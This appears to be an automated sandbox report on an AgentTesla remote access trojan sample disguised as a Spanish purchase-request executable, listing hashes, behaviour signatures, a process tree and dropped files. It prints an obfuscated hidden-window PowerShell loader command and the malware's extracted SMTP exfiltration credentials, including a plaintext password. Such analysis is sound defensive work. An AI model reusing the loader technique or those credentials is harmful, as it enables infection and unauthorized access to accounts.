Analysis

  • max time kernel
    299s
  • max time network
    278s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14/10/2024, 14:08

General

  • Target

    SOLICITUD DE OFERTA.exe

  • Size

    1.2MB

  • MD5

    390f59bff9b8ae12634dabde225597a6

  • SHA1

    9f75d22f6a64e93432fc2f4556a346a70f3e766a

  • SHA256

    8b8937667354563a0742b19df2a43b3a780f6990996522ef97c6354e83a07f49

  • SHA512

    b736203f5c08d35df51c4f357d47c163af77b871ec96a58da67405bfb8d5d2c2a4961a0cf8f444d40364c063561f6ececc952da5861c9b5b81bdc91844876f5f

  • SSDEEP

    24576:voqqHmQ2mlKnSKkdyp/aYchYX2LeQObyCNHlJ7CU1GAb1NXou/ys:voZmQ7kSX1YchBNO+IbV1GAZWu/R

Malware Config

Extracted

Credentials

  • Protocol:
    smtp
  • Host:
    smtp.ionos.es
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    luiyis353173

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Blocklisted process makes network request 11 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SOLICITUD DE OFERTA.exe
    "C:\Users\Admin\AppData\Local\Temp\SOLICITUD DE OFERTA.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3692
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Saltato=Get-Content -raw 'C:\Users\Admin\AppData\Local\Temp\carinal\Coracosteon\mnstring\countersway.Udm';$Drivankret=$Saltato.SubString(9822,3);.$Drivankret($Saltato)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4596
      • C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\SysWOW64\msiexec.exe"
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        PID:4160
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Saltato=Get-Content -raw 'C:\Users\Admin\AppData\Local\Temp\carinal\Coracosteon\mnstring\countersway.Udm';$Drivankret=$Saltato.SubString(9822,3);.$Drivankret($Saltato)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2688
      • C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\SysWOW64\msiexec.exe"
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1980

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199

    Filesize

    854B

    MD5

    e935bc5762068caf3e24a2683b1b8a88

    SHA1

    82b70eb774c0756837fe8d7acbfeec05ecbf5463

    SHA256

    a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d

    SHA512

    bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

    Filesize

    1KB

    MD5

    a60e714bbc7342d72ecaba877225a242

    SHA1

    2ec698e458730921272e7487daad848ec39da21c

    SHA256

    672361f366b811764ab5d3623f694df5bb2e9584efc70dec50eab5c714f03af4

    SHA512

    ebaad070eef834528f34c2faf72bb797f8dbea67860776349ee8a2d4bc204525274e8249127dbdded91d8f94b0c3ef51f4088c10356a0586eb830274d3aef878

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6DA548C7E5915679F87E910D6581DEF1_831B21EC05D416A4ADB2370CD79ABCDD

    Filesize

    471B

    MD5

    7e875f2cb7b89ba1b226013077dfb15d

    SHA1

    73b0e2e58db1b69f8990f338ce345d715c61bce8

    SHA256

    65d19464d58220efb19ef3fff1e8a971db450c9292fe668ad21fb899a25c623c

    SHA512

    c5098ac7d79a0c8e105fb44fecf5c4c2c4ce2bec9d2abb0073a81a3a4517f6a4097711719dc74f15011613aad9f2955cf0a738b3bb3f73f133a211c7ee86c75d

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_CFDBFDB29AA6A71EBDC3E04CD6E276F4

    Filesize

    472B

    MD5

    d4a29b644fe4dbbfca5a24a38149daa1

    SHA1

    faa7e960e3049a39debe420f7ab5ee8ce0de2b32

    SHA256

    88118ac7d69b2eb0fcc514f89f029112d7c71f0cba3b0b8bd7c835ded49c7a0b

    SHA512

    43de3e44111acc21423f7286c0253f500cc67097c7eac090fdb4ca66682e15bd60f69563539fe6c517e1b0aaad5bb9197e5c70d7d2f21c74ea73dc71b6378adc

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199

    Filesize

    170B

    MD5

    ce01494aa90467e3f18c60eabd682e9a

    SHA1

    7b91293c168a726ff165ba3f067b1f59eb6caca5

    SHA256

    7ca1f7bbf374bbf2de4258b33d194fded8613e254489bb35612fa2c6bbd4123e

    SHA512

    bc399d3cd7148e7d68fd763a647ff188dce3d6b84c2db588a89117f78b2f07882661a0e3d8aed7f0cb5f5a5ea652c802c7a6ebefae610e1cc4878a39e0e1ad83

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

    Filesize

    410B

    MD5

    212a5a053193b9a84a4c52e8a417bb7e

    SHA1

    a506824d5953227e71c60679ca27da7170d56e31

    SHA256

    f9e4f446ca3a6a0387495cd7bab58e50ef77eddeefcbadbb2beee2de3dc48e1d

    SHA512

    e7cd6f1eaba02c596abb78f8007ee6fa4fc9ce678d7b447c27d13384f344742ed75d66bfdcfb23e5bf2a740949a9f1a0a82bef158a73379859d12be59079bcc3

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6DA548C7E5915679F87E910D6581DEF1_831B21EC05D416A4ADB2370CD79ABCDD

    Filesize

    402B

    MD5

    d96734d71c4f383a0b971aab973da520

    SHA1

    51df3935a3728f28b49e2da240c41604f94f2bc8

    SHA256

    182ac92b6674e54fcab5277ed144647f49a8254219accf673abcb483b6de53cc

    SHA512

    b9ed7938c8938af790742b0c15c94df270bc1afea28c9b7ead7b69ca0585bc0a23c7a8d65101afd0d2280e001b0568002c5489bef3153b3028ee5813a37465a8

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_CFDBFDB29AA6A71EBDC3E04CD6E276F4

    Filesize

    398B

    MD5

    5f2e58d5031636a37a01b8ba5ffe49b3

    SHA1

    dbde152f868d06237c2f1d05fbd2ed395850a45f

    SHA256

    aa45e56fc1fca8b4f59bd58b25b24d926dbe8e71ee038d445a2509f85838468c

    SHA512

    2de6bcc6cebcf0f0f74f251e45c9b502891a442475024d85600757d349830d90b68808492eaf25576b55ae8899787ba1c4319c378e011f05e6e5cff639b77170

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_suj0iess.vwz.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\carinal\Coracosteon\mnstring\Helldiver.Jun

    Filesize

    317KB

    MD5

    74b846a177b3c4c1ee47f96b9ffd8377

    SHA1

    3a68f447fbb14461c4ca300d19671feed5e771b6

    SHA256

    d09e2ef2e3158f39c4bd2a6563a632a95ac99f826f8824acb9f3cf958409d609

    SHA512

    759726c37d3460e4629156333514617a9197ec82b39f58f29787951069c459cc37b3e50230255374dc632142e82819190472ac7f1febb10aa5f310123c4aefa6

  • C:\Users\Admin\AppData\Local\Temp\carinal\Coracosteon\mnstring\countersway.Udm

    Filesize

    53KB

    MD5

    b4b250e23720806841b663f90a1cc150

    SHA1

    45ddaec0eedc1bf1e81dcf6a5b86c322840df68f

    SHA256

    13e894aa19ac8ad670e713c83f1f170752d77934c319762ff147af4a4155deba

    SHA512

    1642ac1ff2ddf5844472c0442408212d084d3c63c2f27af940ec3974dc30eedd44e4ea06db1688482accdcafad2d4b05378d71febb963bd9af7884842e13b911

  • memory/1980-126-0x0000000000B00000-0x0000000000B6C000-memory.dmp

    Filesize

    432KB

  • memory/1980-124-0x0000000000B00000-0x0000000001D54000-memory.dmp

    Filesize

    18.3MB

  • memory/1980-129-0x0000000023C60000-0x0000000023CB0000-memory.dmp

    Filesize

    320KB

  • memory/1980-130-0x0000000023D50000-0x0000000023DEC000-memory.dmp

    Filesize

    624KB

  • memory/1980-131-0x00000000245D0000-0x0000000024662000-memory.dmp

    Filesize

    584KB

  • memory/1980-132-0x0000000023E50000-0x0000000023E5A000-memory.dmp

    Filesize

    40KB

  • memory/2688-90-0x0000000073DA0000-0x0000000074550000-memory.dmp

    Filesize

    7.7MB

  • memory/2688-27-0x0000000073DA0000-0x0000000074550000-memory.dmp

    Filesize

    7.7MB

  • memory/2688-42-0x0000000008750000-0x0000000008DCA000-memory.dmp

    Filesize

    6.5MB

  • memory/2688-46-0x0000000073DA0000-0x0000000074550000-memory.dmp

    Filesize

    7.7MB

  • memory/2688-45-0x0000000070960000-0x0000000070CB4000-memory.dmp

    Filesize

    3.3MB

  • memory/2688-44-0x0000000070220000-0x000000007026C000-memory.dmp

    Filesize

    304KB

  • memory/2688-43-0x0000000007710000-0x0000000007742000-memory.dmp

    Filesize

    200KB

  • memory/2688-56-0x0000000073DA0000-0x0000000074550000-memory.dmp

    Filesize

    7.7MB

  • memory/2688-58-0x0000000007780000-0x0000000007823000-memory.dmp

    Filesize

    652KB

  • memory/2688-59-0x0000000073DA0000-0x0000000074550000-memory.dmp

    Filesize

    7.7MB

  • memory/2688-57-0x0000000007750000-0x000000000776E000-memory.dmp

    Filesize

    120KB

  • memory/2688-61-0x0000000007880000-0x000000000788A000-memory.dmp

    Filesize

    40KB

  • memory/2688-25-0x0000000073DA0000-0x0000000074550000-memory.dmp

    Filesize

    7.7MB

  • memory/2688-26-0x0000000073DA0000-0x0000000074550000-memory.dmp

    Filesize

    7.7MB

  • memory/2688-74-0x0000000007A30000-0x0000000007A54000-memory.dmp

    Filesize

    144KB

  • memory/2688-73-0x0000000007A00000-0x0000000007A2A000-memory.dmp

    Filesize

    168KB

  • memory/2688-89-0x0000000073DA0000-0x0000000074550000-memory.dmp

    Filesize

    7.7MB

  • memory/2688-85-0x0000000073DA0000-0x0000000074550000-memory.dmp

    Filesize

    7.7MB

  • memory/2688-82-0x0000000073DA0000-0x0000000074550000-memory.dmp

    Filesize

    7.7MB

  • memory/2688-81-0x0000000073DA0000-0x0000000074550000-memory.dmp

    Filesize

    7.7MB

  • memory/2688-78-0x0000000073DA0000-0x0000000074550000-memory.dmp

    Filesize

    7.7MB

  • memory/4160-127-0x0000000000B00000-0x0000000001D54000-memory.dmp

    Filesize

    18.3MB

  • memory/4596-37-0x0000000006C20000-0x0000000006CB6000-memory.dmp

    Filesize

    600KB

  • memory/4596-10-0x0000000004C70000-0x0000000004C92000-memory.dmp

    Filesize

    136KB

  • memory/4596-83-0x0000000008520000-0x000000000C371000-memory.dmp

    Filesize

    62.3MB

  • memory/4596-75-0x0000000073DA0000-0x0000000074550000-memory.dmp

    Filesize

    7.7MB

  • memory/4596-86-0x0000000073DA0000-0x0000000074550000-memory.dmp

    Filesize

    7.7MB

  • memory/4596-87-0x0000000073DA0000-0x0000000074550000-memory.dmp

    Filesize

    7.7MB

  • memory/4596-88-0x0000000073DA0000-0x0000000074550000-memory.dmp

    Filesize

    7.7MB

  • memory/4596-60-0x0000000070220000-0x000000007026C000-memory.dmp

    Filesize

    304KB

  • memory/4596-91-0x0000000073DA0000-0x0000000074550000-memory.dmp

    Filesize

    7.7MB

  • memory/4596-6-0x0000000073DAE000-0x0000000073DAF000-memory.dmp

    Filesize

    4KB

  • memory/4596-38-0x0000000006170000-0x000000000618A000-memory.dmp

    Filesize

    104KB

  • memory/4596-39-0x00000000061C0000-0x00000000061E2000-memory.dmp

    Filesize

    136KB

  • memory/4596-76-0x0000000073DAE000-0x0000000073DAF000-memory.dmp

    Filesize

    4KB

  • memory/4596-62-0x0000000070960000-0x0000000070CB4000-memory.dmp

    Filesize

    3.3MB

  • memory/4596-40-0x0000000007270000-0x0000000007814000-memory.dmp

    Filesize

    5.6MB

  • memory/4596-23-0x0000000005C60000-0x0000000005C7E000-memory.dmp

    Filesize

    120KB

  • memory/4596-24-0x0000000005C80000-0x0000000005CCC000-memory.dmp

    Filesize

    304KB

  • memory/4596-22-0x0000000005630000-0x0000000005984000-memory.dmp

    Filesize

    3.3MB

  • memory/4596-12-0x0000000004D90000-0x0000000004DF6000-memory.dmp

    Filesize

    408KB

  • memory/4596-11-0x0000000004D20000-0x0000000004D86000-memory.dmp

    Filesize

    408KB

  • memory/4596-77-0x0000000073DA0000-0x0000000074550000-memory.dmp

    Filesize

    7.7MB

  • memory/4596-72-0x0000000073DA0000-0x0000000074550000-memory.dmp

    Filesize

    7.7MB

  • memory/4596-8-0x0000000073DA0000-0x0000000074550000-memory.dmp

    Filesize

    7.7MB

  • memory/4596-9-0x0000000004E80000-0x00000000054A8000-memory.dmp

    Filesize

    6.2MB

  • memory/4596-7-0x0000000002660000-0x0000000002696000-memory.dmp

    Filesize

    216KB